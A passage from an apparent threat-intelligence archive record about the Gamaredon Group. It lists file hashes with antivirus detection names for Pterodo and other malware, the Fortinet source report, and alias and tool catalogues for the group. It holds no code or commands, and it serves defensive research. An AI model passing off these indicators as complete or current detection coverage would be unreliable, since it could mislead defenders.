VBA/Agent.ATF!tr.dldr\r\n7ba638e8a53e6d1713b8f045c27170ef4a75c88197c57fffe227ca2ab05271e7 - BAT/Agent.GP!tr\r\n842612d1afdf78cb8893018f3aeeec7df9f5f0ab245fe8e6d6b28519d0787937 - BAT/Pterodo.SV!tr\r\n92b474f037796e67cd2f36199a95c9feff46af7e58f4d528567f3f0a857132bf - LNK/Agent.GP!tr\r\n995e6e0f90c58c82744545bf133b8c4c17decbe851953b0ffe5b21d625cade7d - LNK/Agent.GP!tr\r\na67167f363c2501d6a1436e5f8c12693d7cf9d2f3ca1f71b21c292f041f91c7a - 
W32/Pterodo.RN!tr\r\n3b50342b6cd96f400fbf7f00098a7dfcc9561037e4aa0bad8cfeafbb6f17923b - Riskware/PasswordProtected\r\nbc39db24919b69e80bfb534204f4441a162ca336379bf9eb66b038e039889aac - W32/Generic.VA!tr\r\nc7bed1150d1b8b3b97454d1e47b6c246fffc471dd03d5a1d094bdf2d807b8e5e - LNK/Agent.GP!tr\r\nd2bbecda830821ed3a00737c67fecb7985d612af58a31a1ee8488ad0409ed23b - LNK/Agent.GP!tr\r\ne1e31702aad4bd7557a05906eb3004e9a72d77aa57e448379bee9a350cbba657 - BAT/Pterodo.SV!tr\r\nffc438d33f45ea56935f2bb6fca29e71862ecafb8b7e69ea19abd6df2d255075 - BAT/Pterodo.SV!tr\r\nSource: https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/gamaredon-group-ttp-profile-analysis.html"
	],
	"report_names": [
		"gamaredon-group-ttp-profile-analysis.html"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM ",
				"Aqua Blizzard ",
				"Armageddon",
				"Blue Otso ",
				"BlueAlpha ",
				"Dancing Salome ",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051 ",
				"Primitive Bear ",
				"Shuckworm ",
				"Trident Ursa ",
				"UAC-0010 ",
				"UNC530 ",
				"WinterFlounder "
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775433977,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3a1fb440fc13569a3c5679ee614c38636f2d5cd6.pdf",
		"text": "https://archive.orkl.eu/3a1fb440fc13569a3c5679ee614c38636f2d5cd6.txt",
		"img": "https://archive.orkl.eu/3a1fb440fc13569a3c5679ee614c38636f2d5cd6.jpg"
	}
}